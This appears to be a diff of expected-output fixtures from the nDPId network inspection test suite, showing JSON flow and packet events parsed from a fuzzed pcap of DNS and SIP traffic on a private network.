00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470814186,"flow_last_seen":1120470814186,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470814186,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2799,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1120470814186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470814186,"pkt":"ADBUADRWAODtAW69CABFAABEa6gAAIARS63AqAECwKgBAQrvADXTMAi8HBQAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":522,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":193,"flow_packet_id":1,"flow_last_seen":1120470814186,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470814186,"pkt":"ADBUADRWAODtAW69CABFAABEa6gAAIARS63AqAECwKgBAQrvADXTMAi8HBQAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAAAwAAQ=="}
@@ -1033,15 +1033,15 @@
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1120470817390,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470817390,"pkt":"ADBUADRWAODtAW69CABFAABIa6wAAIARS6XAqAECwKgBAQrwADUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":529,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":195,"flow_packet_id":3,"flow_last_seen":1120470817390,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470817390,"pkt":"ADBUADRWAODtAW69CABFAABIa6wAAIARS6XAqAECwKgBAQrwADUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120470819393,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":530,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470819393,"flow_last_seen":1120470819393,"flow_idle_time":180000,"flow_min_l4_payload_len":9,"flow_max_l4_payload_len":9,"flow_tot_l4_payload_len":9,"flow_avg_l4_payload_len":9,"midstream":0,"thread_ts_msec":1120470819393,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2800,"dst_port":21,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1120470819393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":17,"thread_ts_msec":1120470819393,"pkt":"ADBUADRWAODtAW69CABFAAAlcwAAAIARS6TAqAECwKgBAQrwABUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3libXJjaXR5AmRrAAAhAAE="} 00509{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":530,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":196,"flow_packet_id":1,"flow_last_seen":1120470819393,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":17,"thread_ts_msec":1120470819393,"pkt":"ADBUADRWAODtAW69CABFAAAlcwAAAIARS6TAqAECwKgBAQrwABUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3libXJjaXR5AmRrAAAhAAE="}
00414{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":531,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":9587,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470819393,"pkt":"ADBUADRWAODtAW69JXMAAABIa64AAIARS6PAqAECwKgBAQrwADUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00400{"packet_event_id":1,"packet_event_name":"packet","packet_id":531,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":86,"pkt_type":9587,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":86,"pkt_l4_len":0,"thread_ts_msec":1120470819393,"pkt":"ADBUADRWAODtAW69JXMAAABIa64AAIARS6PAqAECwKgBAQrwADUANDG\/+BUBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00212{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"thread_id":0,"packet_id":531,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":9587,"global_ts_msec":1120470823399} 00198{"basic_event_id":5,"basic_event_name":"Unknown packet type","datalink":1,"packet_id":531,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","layer_type":9587,"global_ts_msec":1120470823399}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1120470831400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470831400,"pkt":"ADBUADRWAODtAW69CABFAABEa7IAAIARS6PAqAECwKgBAQrxADUAMKq2ehcAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAQAwAAQ=="} 00504{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":1,"flow_last_seen":1120470831400,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":82,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":82,"pkt_l4_len":48,"thread_ts_msec":1120470831400,"pkt":"ADBUADRWAODtAW69CABFAABEa7IAAIARS6PAqAECwKgBAQrxADUAMKq2ehcAAAABAAAAAAAAATEBMAEwAzEyNwdpbi1hZGRyBGFycGEAQAwAAQ=="}
00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00790{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":535,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831400,"flow_last_seen":1120470831400,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":40,"flow_tot_l4_payload_len":40,"flow_avg_l4_payload_len":40,"midstream":0,"thread_ts_msec":1120470831400,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"1.0.0.127.in-addr.arpa","num_queries":0,"num_answers":0,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":1120470831402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470831402,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvEAR40yeheAAAABAAEAAAAAATEBMCVzADEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"} 00534{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_packet_id":2,"flow_last_seen":1120470831402,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":105,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":105,"pkt_l4_len":71,"thread_ts_msec":1120470831402,"pkt":"AODtAW69ADBUADRWCABFAABbAABAAEARtz7AqAEBwKgBAgA1CvEAR40yeheAAAABAAEAAAAAATEBMCVzADEyNwdpbi1hZGRyBGFycGEAAAwAAcAMAAwAAQAAJxAACwlsb2NhbGhvc3QA"}
00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470831402,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00886{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":536,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":197,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1120470831400,"flow_last_seen":1120470831402,"flow_idle_time":180000,"flow_min_l4_payload_len":40,"flow_max_l4_payload_len":63,"flow_tot_l4_payload_len":103,"flow_avg_l4_payload_len":51,"midstream":0,"thread_ts_msec":1120470831402,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2801,"dst_port":53,"l4_proto":"udp","ndpi": {"flow_risk": {"17": {"risk":"Malformed Packet","severity":"Low","risk_score": {"total":260,"client":130,"server":130}}},"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"num_queries":1,"num_answers":1,"reply_code":0,"query_type":16396,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00979{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":537,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":508,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":508,"pkt_l4_len":0,"thread_ts_msec":1120470831402,"pkt":"ADBUADRWAODtAW69CABFAAHua7MAJXMAFYzAqAEC1PIhIxPEE8QB2oO4UkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMjY5MzY5tDUtNDc5ZTgzZjExOTIuMTY4LjEuMjtycG9ydA0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MTliMDYxNA0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz4NCkNhbGwtSUQ6IDI5ODU4MTQ3LTQ2NWIwNzUyQDI5ODU4MDUxLTQ2NWIwN2IyDQpDb250YWN0OiBwZWwgPHNpcDozNTEwNDcyM0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9N2QzNjU1OGYzMTM2NzA1MT47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDMgUkVHSVNURVINCkNvbnRlbnQtTGVuZ3RoOiAwDQpNYXgtRm9yd2FyZHM6IDcwDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb2wgMi4wLjUxLjE2DQoNCg=="} 00965{"packet_event_id":1,"packet_event_name":"packet","packet_id":537,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":508,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":508,"pkt_l4_len":0,"thread_ts_msec":1120470831402,"pkt":"ADBUADRWAODtAW69CABFAAHua7MAJXMAFYzAqAEC1PIhIxPEE8QB2oO4UkVHSVNURVIgc2lwOnNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KVmlhOiBTSVAvMi4wL1VEUCAxOTIuMTY4LjEuMjticmFuY2g9ejloRzRiS25wMjY5MzY5tDUtNDc5ZTgzZjExOTIuMTY4LjEuMjtycG9ydA0KRnJvbTogPHNpcDozNTEwNDcyM0BzaXAuY3liZXJjaXR5LmRrPjt0YWc9MTliMDYxNA0KVG86IDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz4NCkNhbGwtSUQ6IDI5ODU4MTQ3LTQ2NWIwNzUyQDI5ODU4MDUxLTQ2NWIwN2IyDQpDb250YWN0OiBwZWwgPHNpcDozNTEwNDcyM0AxOTIuMTY4LjEuMjo1MDYwO2xpbmU9N2QzNjU1OGYzMTM2NzA1MT47ZXhwaXJlcz0xMjAwO3E9MC41MDANCkV4cGlyZXM6IDEyMDANCkNTZXE6IDMgUkVHSVNURVINCkNvbnRlbnQtTGVuZ3RoOiAwDQpNYXgtRm9yd2FyZHM6IDcwDQpVc2VyLUFnZW50OiBOZXJvIFNJUFBTIElQIFBob25lIFZlcnNpb2wgMi4wLjUxLjE2DQoNCg=="}
00231{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"thread_id":0,"packet_id":537,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":474,"global_ts_msec":1120470831403} 00217{"basic_event_id":9,"basic_event_name":"nDPI IPv4\/L4 payload detection failed","datalink":1,"packet_id":537,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","l4_data_len":474,"global_ts_msec":1120470831403}
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1120470831516,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470831516,"pkt":"ADBUADRWAODsAW69CABFAABIa7QAAIARS53AqAECwKgBAQoIADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_packet_id":1,"flow_last_seen":1120470831516,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470831516,"pkt":"ADBUADRWAODsAW69CABFAABIa7QAAIARS53AqAECwKgBAQoIADUANBq8DxcBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":538,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":198,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470831516,"flow_last_seen":1120470831516,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470831516,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2568,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
@@ -1065,8 +1065,8 @@
00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00590{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3}
00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1120470848643,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470848643,"pkt":"ADBUADRWAODtAW69CABFAABIW7sAAIARS5bAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="} 00508{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_packet_id":1,"flow_last_seen":1120470848643,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1120470848643,"pkt":"ADBUADRWAODtAW69CABFAABIW7sAAIARS5bAqAECwKgBAQr0ADUANOq3PxkBAAABAAAAAAAABF9zaXAEX3VkcANzaXAJY3liZXJjaXR5AmRrAAAhAAE="}
00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00791{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":549,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","flow_id":202,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1120470848643,"flow_last_seen":1120470848643,"flow_idle_time":180000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1120470848643,"l3_proto":"ip4","src_ip":"192.168.1.2","dst_ip":"192.168.1.1","src_port":2804,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"Network"},"dns": {"query":"_sip._udp.sip.cybercity.dk","num_queries":0,"num_answers":0,"reply_code":0,"query_type":33,"rsp_type":0,"rsp_addr":"0.0.0.0"}}
00812{"packet_event_id":1,"packet_event_name":"packet","thread_id":0,"packet_id":551,"source":"fuzz-2006-06-26-2594.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":382,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":382,"pkt_l4_len":0,"thread_ts_msec":1120470848682,"pkt":"ADBUADRWAODtAW69CAA\/AAFwa7wAAIARFgHAeQEC1PIhIxPEE8QBXMMEQUNLIHNpcDowMDk3MjM5Mjg3MDQ0QHNpcC5jeWJlcmNpdHkuZGsgU0lQLzIuMA0KRnJvbTogImFyaWsiIDxzaXA6MzUxMDQ3MjNAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTE3NWExZGQNbENhbGwtSUQ6IDI0NDg3MzkxLTQ0OWJmMmEwQDE5Mi4xNjguMS4yDQpWaWE6IFNJUC8yLjAvVURQIDE5Mi4xNjguMS4yOjUwNjA7YnJhbmNoPXo5aEc0YktucDI0NDY2NDAyLTQ1ZGM2MWQ1MTkyLjE2OC4xLjI7cnBvcnQNClRvOiA8c2lwOjAwOTcyMzkyODcwNDRAc2lwLmN5YmVyY2l0eS5kaz47dGFnPTBMLTA0JXMALTE3MDFiOWEwLTEzYzkyYTY3Mg0KQ1NlcTogMSBBQ0sNCkNvbnRlbnQtTGVuZ3RoOiAwDQoNCg=="} 